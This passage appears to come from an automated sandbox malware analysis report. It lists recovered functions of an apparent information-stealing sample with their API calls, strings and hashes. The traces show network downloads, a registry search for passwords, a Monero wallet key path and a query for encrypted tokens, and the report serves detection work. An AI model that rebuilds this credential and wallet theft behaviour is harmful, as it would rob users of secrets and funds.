                          Function 001660A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                            • Part of subcall function 001647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00164839
                            • Part of subcall function 001647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00164849
                          • InternetOpenA.WININET(00180DF7,00000001,00000000,00000000,00000000), ref: 0016610F
                          • StrCmpCA.SHLWAPI(?,00CCFC38), ref: 00166147
                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0016618F
                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 001661B3
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 001661DC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0016620A
                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00166249
                          • InternetCloseHandle.WININET(?), ref: 00166253
                          • InternetCloseHandle.WININET(00000000), ref: 00166260
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                          • String ID:
                          • API String ID: 2507841554-0
                          • Opcode ID: 38a2fe26aaedf75adfe0c0b69ebe4301d2902cec7dce715c957a521eef4293a9
                          • Instruction ID: 39650210d19a935fe7071e6094628bc660114c8ccfc050a3da14f3fbd6f7ed43
                          • Opcode Fuzzy Hash: 38a2fe26aaedf75adfe0c0b69ebe4301d2902cec7dce715c957a521eef4293a9
                          • Instruction Fuzzy Hash: 765171B1940218ABDB24DFA0DC59BEE77B8FF44701F108098B609A71C0DB756A89CF95
                          Function 001672D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0016733A
                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 001673B1
                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0016740D
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00167452
                          • HeapFree.KERNEL32(00000000), ref: 00167459
                          • task.LIBCPMTD ref: 00167555
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeOpenProcessValuetask
                          • String ID: Password
                          • API String ID: 775622407-3434357891
                          • Opcode ID: 762c0c02865d4d47a9ac93522562a7157eb11537d50a807f76a2c9b73b01cd20
                          • Instruction ID: ff65391b6baf63edb3f00be4ea0e865e687a544b8b9cc321204938e03073910f
                          • Opcode Fuzzy Hash: 762c0c02865d4d47a9ac93522562a7157eb11537d50a807f76a2c9b73b01cd20
                          • Instruction Fuzzy Hash: A8614BB19142289BDB24DB50CC55BEAB7BCBF58304F0081E9E649A6181DF705BD9CFA1
                          Function 0016BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          • lstrlen.KERNEL32(00000000), ref: 0016BC9F
                            • Part of subcall function 00178E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00178E52
                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 0016BCCD
                          • lstrlen.KERNEL32(00000000), ref: 0016BDA5
                          • lstrlen.KERNEL32(00000000), ref: 0016BDB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                          • API String ID: 3073930149-1079375795
                          • Opcode ID: baf8700c42b4eef2ce7bbf4f758d9091cd2e315b421a8beef7b550f054d6c4a6
                          • Instruction ID: 6ab0194265178f1348538d03149f5c9f2708ee09dce853cc4cd95558a9dd56d7
                          • Opcode Fuzzy Hash: baf8700c42b4eef2ce7bbf4f758d9091cd2e315b421a8beef7b550f054d6c4a6
                          • Instruction Fuzzy Hash: 0CB12772910104ABDB05FBA0DD96DEE733DAFA4301F808558F50AA7091EF346F59CB62
                          Function 00176770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: c664ea807934a20027ebaa251f2aba328518492c7e7f014567826fb4978f7a32
                          • Instruction ID: 03844f0be93b32302fee1ee2e8b24d433c1089a452aae13f24b977903485f0b0
                          • Opcode Fuzzy Hash: c664ea807934a20027ebaa251f2aba328518492c7e7f014567826fb4978f7a32
                          • Instruction Fuzzy Hash: 17F05E32904609EFD3859FE0E90977D7B78FB06703F140198E61986290D7754F81DB96
                          Function 00164FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00164FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00164FD1
                          • InternetOpenA.WININET(00180DDF,00000000,00000000,00000000,00000000), ref: 00164FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00165011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00165041
                          • InternetCloseHandle.WININET(?), ref: 001650B9
                          • InternetCloseHandle.WININET(?), ref: 001650C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 9b37b54efbb26fd93a1d9bffef2a5489a5993b2f191abb0b2adb69d168ff43dd
                          • Instruction ID: 696ef6e3cceddafe29700801142d92855b7c289dd798963f5e34fb48ce3169f3
                          • Opcode Fuzzy Hash: 9b37b54efbb26fd93a1d9bffef2a5489a5993b2f191abb0b2adb69d168ff43dd
                          • Instruction Fuzzy Hash: C33108B5A40218ABDB20CF94DC85BDDB7B8EB48704F5081D8FA09A7281C7706AC5CF99
                          Function 001783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00178426
                          • wsprintfA.USER32 ref: 00178459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0017847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0017848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00178499
                            • Part of subcall function 0017A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0017A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00CCF0F8,00000000,000F003F,?,00000400), ref: 001784EC
                          • lstrlen.KERNEL32(?), ref: 00178501
                          • RegQueryValueExA.ADVAPI32(00000000,00CCF218,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00180B34), ref: 00178599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00178608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0017861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 03c2de3702febb20dfe9a84d162c55e5630a5dad4ea1a92fe9091d28632b48b3
                          • Instruction ID: 97cf61eec909e51b5cdc1745f5fda0b892eb25e9012bedcb9cee417301c5298e
                          • Opcode Fuzzy Hash: 03c2de3702febb20dfe9a84d162c55e5630a5dad4ea1a92fe9091d28632b48b3
                          • Instruction Fuzzy Hash: 2821FA7295021CABDB64DB54DC85FE9B7B8FB48700F00C5D8E609A6140DF756A85CFD4
                          Function 00177690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001776A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001776AB
                          • RegOpenKeyExA.ADVAPI32(80000002,00CBB7F0,00000000,00020119,00000000), ref: 001776DD
                          • RegQueryValueExA.ADVAPI32(00000000,00CCEFF0,00000000,00000000,?,000000FF), ref: 001776FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00177708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 2f0ac4c8fa808b44fabf3c45662df81700b98c6195377e0210c3bc1b3ce1dc34
                          • Instruction ID: ca74abb01e2cb410c90d824069711580042e8e943c3e157c3d450d4ed1839565
                          • Opcode Fuzzy Hash: 2f0ac4c8fa808b44fabf3c45662df81700b98c6195377e0210c3bc1b3ce1dc34
                          • Instruction Fuzzy Hash: C3018FB6A04208BBEB05DBE4DC4DF6AB7BCEB48701F008054FA08972D0D7749A04CB51
                          Function 00177720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00177734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0017773B
                          • RegOpenKeyExA.ADVAPI32(80000002,00CBB7F0,00000000,00020119,001776B9), ref: 0017775B
                          • RegQueryValueExA.ADVAPI32(001776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0017777A
                          • RegCloseKey.ADVAPI32(001776B9), ref: 00177784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 126a493cc99c6439552e781f4e14f57421643ddfd599d3cf2ed59ba39801342a
                          • Instruction ID: 82e2da1baf10385b3f2dcc40799b7d2b891c204ada688f038df0099176105baf
                          • Opcode Fuzzy Hash: 126a493cc99c6439552e781f4e14f57421643ddfd599d3cf2ed59ba39801342a
                          • Instruction Fuzzy Hash: 9A014FBAA40308BBDB01DBE4DC4AFBEBBBCEB48701F004158FA05A7281DB755A00CB51
                          Function 001699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001699EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00169A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00169A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0016148F,00000000), ref: 00169A5A
                          • LocalFree.KERNEL32(0016148F), ref: 00169A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00169A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 3961633b9a0e7a8b30d234ef3c53b5b00532f4c37a78b62199bf18e7547114ae
                          • Instruction ID: 8f1511b8c60db946dd30668898730a5ace2868c37a63acd9685e54a6fb7c2744
                          • Opcode Fuzzy Hash: 3961633b9a0e7a8b30d234ef3c53b5b00532f4c37a78b62199bf18e7547114ae
                          • Instruction Fuzzy Hash: E1310A74A00209EFDB14CF94C985BAE77F9FF49340F108158E916A7390D779A951CFA1
                          Function 00174780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcat.KERNEL32(?,00CCF2D8), ref: 001747DB
                            • Part of subcall function 00178DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00178E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00174801
                          • lstrcat.KERNEL32(?,?), ref: 00174820
                          • lstrcat.KERNEL32(?,?), ref: 00174834
                          • lstrcat.KERNEL32(?,00CBA668), ref: 00174847
                          • lstrcat.KERNEL32(?,?), ref: 0017485B
                          • lstrcat.KERNEL32(?,00CCE298), ref: 0017486F
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 00178D90: GetFileAttributesA.KERNEL32(00000000,?,00161B54,?,?,0018564C,?,?,00180E1F), ref: 00178D9F
                            • Part of subcall function 00174570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00174580
                            • Part of subcall function 00174570: RtlAllocateHeap.NTDLL(00000000), ref: 00174587
                            • Part of subcall function 00174570: wsprintfA.USER32 ref: 001745A6
                            • Part of subcall function 00174570: FindFirstFileA.KERNEL32(?,?), ref: 001745BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmpDownload File
